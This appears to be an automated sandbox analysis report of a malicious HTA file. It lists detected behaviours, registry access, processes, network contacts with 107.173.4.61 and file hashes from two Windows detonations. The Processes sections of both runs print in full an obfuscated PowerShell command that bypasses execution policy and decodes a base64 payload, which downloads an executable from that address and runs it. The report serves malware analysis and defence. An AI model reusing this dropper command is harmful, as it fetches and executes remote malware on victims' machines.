Analysis Overview
SHA256
5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546
Threat Level: Likely malicious
The file 5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta was found to be: Likely malicious.
Malicious Activity Summary
Evasion via Device Credential Deployment
Blocklisted process makes network request
Checks computer location settings
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 02:28
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 02:28
Reported
2024-11-14 02:31
Platform
win7-20240903-en
Max time kernel
120s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta"
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\izdu6utb.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAD21.tmp"
Network
| Country | Destination | Domain | Proto |
| US | 107.173.4.61:80 | | tcp |
| US | 107.173.4.61:80 | | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 0e0ce348f6ba941e618f1f455f29bea6 |
| SHA1 | 9ba4c3c056c3e0c5997fd8eda7812d1b1a353324 |
| SHA256 | 06242b3b804c45f717ffc02587d79a5cb14a98cb8baa625601f31fdaab3c1b35 |
| SHA512 | 2af0e2e84d46fda69b4fb3bafebff13473f15199c943f1d93f9c08f901af18cb03f44e0f1f7b4f333d465e6e000b5fc4134d5a29e58fe671be5ad9451f4c27b0 |
\??\c:\Users\Admin\AppData\Local\Temp\izdu6utb.cmdline
| MD5 | 39436a3ec2a28845767ca16383e33bd1 |
| SHA1 | 5003dd9e8157d5f18e1610fcfb89da7f0e5b6b27 |
| SHA256 | 805a6e724b1d941e225b313dfaec1a58cf13ede9db57896dc4acfefca1731992 |
| SHA512 | eff698496ff9504ddff80e7d87415ae24cf3d3888165f5bf01aa0390285db7f84450dd55a833d0ae04b3d686b04578eb340cd23da5e3931d297ddda775be7097 |
\??\c:\Users\Admin\AppData\Local\Temp\izdu6utb.0.cs
| MD5 | 4af98cbe7b888e1e92e1aa8a35732223 |
| SHA1 | 75d54c91355c97fc9b1c3453efea5dccd817ed42 |
| SHA256 | 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34 |
| SHA512 | 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCAD21.tmp
| MD5 | a39953edc790fd3c055982264d45ebd9 |
| SHA1 | 030b6c5c9f542e7a2c11e31e6f6cd192fe625d28 |
| SHA256 | 73e60fa13a32189fc6acb4f43438c43bea75ab6c954610c83a0e03adb8f5498b |
| SHA512 | 21f55a0a46f8326aaba23334a6693dd0bea8547156fdab2b350958d670d00b47ab8a834f1beef1aece6b4eab761032efab633ded776481f038cb8cde29f9192d |
C:\Users\Admin\AppData\Local\Temp\RESAD22.tmp
| MD5 | 78ba4ba9e5cd4d1450123b290bb33f7b |
| SHA1 | a345efa2b3a9a661451bdcd73fa957216475a0d9 |
| SHA256 | a95e272886f38db936882deb9994674cc2a43a07d8a80bb92012fa916e36fd77 |
| SHA512 | 5741f1538d57a7399f053e387974fcbbfe4ce2f2854659dd9164cc610f07791678233c304751bb7bc3ffa46b1e4d607469e5943d837ddcac2a9b2f50dbf659e0 |
C:\Users\Admin\AppData\Local\Temp\izdu6utb.dll
| MD5 | 3218f868f336ca301438aeb48e571988 |
| SHA1 | 55c770ae3601d5c090fef1d74f3bc8fade78d343 |
| SHA256 | 227bcaafdd1ee0187da1546b91d8fcfbd30ec783757c5121d98c2455e0001fcc |
| SHA512 | 00155c6ba172374c16ca5d05b3e9b082c91f3a8f264bcef8b90c21f20a837caf77a545de4cd3605d723f8a647b901b0959818ce846eb4f64d587bce326b37d0c |
C:\Users\Admin\AppData\Local\Temp\izdu6utb.pdb
| MD5 | 943f5fe78cba3be93ead28a8da5ba683 |
| SHA1 | a3cf7fe11d10fee595d7ebf1f5648ee18db07c7b |
| SHA256 | b95ff72fb9f74ee921d909d6152b9b3cdce12b4d4b460c90af4ca7b644dbbaa9 |
| SHA512 | fc907e54b6c4ce0a25219fc29e6e3f8ce3c2a1ef119d646762523f591b1203a411ea2de46d9f00827169fe7a09fad176618831a9dc04fc8546fccdef84935a7f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 02:28
Reported
2024-11-14 02:31
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0in0nkpt\0in0nkpt.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B1B.tmp" "c:\Users\Admin\AppData\Local\Temp\0in0nkpt\CSCF7334F6B65CC4901955A98945D67A3C8.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 107.173.4.61:80 | | tcp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.210.23.2.in-addr.arpa | udp |
Files
memory/3968-0-0x000000007174E000-0x000000007174F000-memory.dmp
memory/3968-1-0x0000000002E30000-0x0000000002E66000-memory.dmp
memory/3968-2-0x0000000071740000-0x0000000071EF0000-memory.dmp
memory/3968-3-0x00000000059C0000-0x0000000005FE8000-memory.dmp
memory/3968-4-0x0000000071740000-0x0000000071EF0000-memory.dmp
memory/3968-5-0x00000000057F0000-0x0000000005812000-memory.dmp
memory/3968-7-0x00000000060D0000-0x0000000006136000-memory.dmp
memory/3968-6-0x0000000006060000-0x00000000060C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vh05zdil.ilh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3968-17-0x0000000006240000-0x0000000006594000-memory.dmp
memory/3968-18-0x0000000006730000-0x000000000674E000-memory.dmp
memory/3968-19-0x0000000006770000-0x00000000067BC000-memory.dmp
memory/5060-29-0x0000000007410000-0x0000000007442000-memory.dmp
memory/5060-30-0x000000006E000000-0x000000006E04C000-memory.dmp
memory/5060-40-0x0000000006790000-0x00000000067AE000-memory.dmp
memory/5060-41-0x00000000074D0000-0x0000000007573000-memory.dmp
memory/5060-42-0x0000000007C00000-0x000000000827A000-memory.dmp
memory/5060-43-0x00000000074A0000-0x00000000074BA000-memory.dmp
memory/5060-44-0x00000000075C0000-0x00000000075CA000-memory.dmp
memory/5060-45-0x00000000077F0000-0x0000000007886000-memory.dmp
memory/5060-46-0x0000000007760000-0x0000000007771000-memory.dmp
memory/5060-47-0x0000000007790000-0x000000000779E000-memory.dmp
memory/5060-48-0x00000000077A0000-0x00000000077B4000-memory.dmp
memory/5060-49-0x00000000078B0000-0x00000000078CA000-memory.dmp
memory/5060-50-0x00000000077E0000-0x00000000077E8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\0in0nkpt\0in0nkpt.cmdline
| MD5 | a1d1dd60bb7da6fdd01bbf8e8e41fe2c |
| SHA1 | a2b6edfa7d9348752d2df54bf146fe3e624f27ca |
| SHA256 | d2c4a82f465f4902debaab261e11cba21dcdf9a91dc746847189cdb410d60ca5 |
| SHA512 | 734860982e6bf1e06ce962ab8a87dd12ed40f52b7d49eeafbdfa57341abeb54d9af19726ea786ff089e8a528b2d8164bd02220edeba55c564dfea536e7383aae |
\??\c:\Users\Admin\AppData\Local\Temp\0in0nkpt\0in0nkpt.0.cs
| MD5 | 4af98cbe7b888e1e92e1aa8a35732223 |
| SHA1 | 75d54c91355c97fc9b1c3453efea5dccd817ed42 |
| SHA256 | 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34 |
| SHA512 | 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3 |
\??\c:\Users\Admin\AppData\Local\Temp\0in0nkpt\CSCF7334F6B65CC4901955A98945D67A3C8.TMP
| MD5 | 18a135d11fca8199ca0899ce38002751 |
| SHA1 | 68c5991902e3012bd690dec62c50e0aa14ee1c13 |
| SHA256 | 2b6a9838681ca7dd29134382a42b80839d9aeac11fcace801eb6812c11b60219 |
| SHA512 | 5c024b26b02b1cc805f16cf6e5e36fefe5e2c0b0ab6087c6f50525b136eca8b886ff72e580b5c808c50c2ad07966addbc155516ce6fbc4a473acbe02c57c36e9 |
C:\Users\Admin\AppData\Local\Temp\RES7B1B.tmp
| MD5 | 34f33a6ed897ead12abe8b25165f5bbf |
| SHA1 | d354205cc95d473e450e5f1a036642d627248612 |
| SHA256 | 95aa5022ef00277999fb8dfa4da7b75961cfd6e6ce7451c12cf060bd02b19ed2 |
| SHA512 | b76e6f5cb9c885f86c13529132bc1a7401879fdf38349aca66d2a4ca1aa67c72941292dfb7d6dadb45c628a297c7e09cf522fadec18fc24db6f1b0ea94482a23 |
C:\Users\Admin\AppData\Local\Temp\0in0nkpt\0in0nkpt.dll
| MD5 | 145fe68db1e3360a7d472644b62dd45c |
| SHA1 | 8774f564706e16d1b71da942b31ecfb2e6fa6ed4 |
| SHA256 | ed3254984a0b2ce127fa4fec1fadd3e40a04a320c185611d7279461019f7a951 |
| SHA512 | e4f818499d5fd503b801b5505ad72909facc24598fb731bda7b9cd5e4bc1bb3c78bf7e751e6359bbba23dc28bbda1a1e2236195b9721e36bd31513596d1506f7 |
memory/3968-65-0x0000000006CE0000-0x0000000006CE8000-memory.dmp
memory/3968-67-0x000000007174E000-0x000000007174F000-memory.dmp
memory/3968-68-0x0000000071740000-0x0000000071EF0000-memory.dmp
memory/3968-69-0x0000000071740000-0x0000000071EF0000-memory.dmp
memory/3968-70-0x0000000007AF0000-0x0000000007B12000-memory.dmp
memory/3968-71-0x0000000008CC0000-0x0000000009264000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96b2f0a83736315afed33226cb021197 |
| SHA1 | 396373463b0f5f9627f5592eb89aafd56507aa20 |
| SHA256 | 9b44ef0b05e17a79c69ccb3b1940ad6b66eeb40e54a8854a0a9bf854c9220108 |
| SHA512 | 74db69ba9edc0fa69a5d6c468692fa24acaba3dd8f9099f32fa728714259f832068606d22adeb14976ab96be26215a1e9eb9551cf049f08894b4993f795444a6 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POwersHeLl.ExE.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/3968-75-0x0000000071740000-0x0000000071EF0000-memory.dmp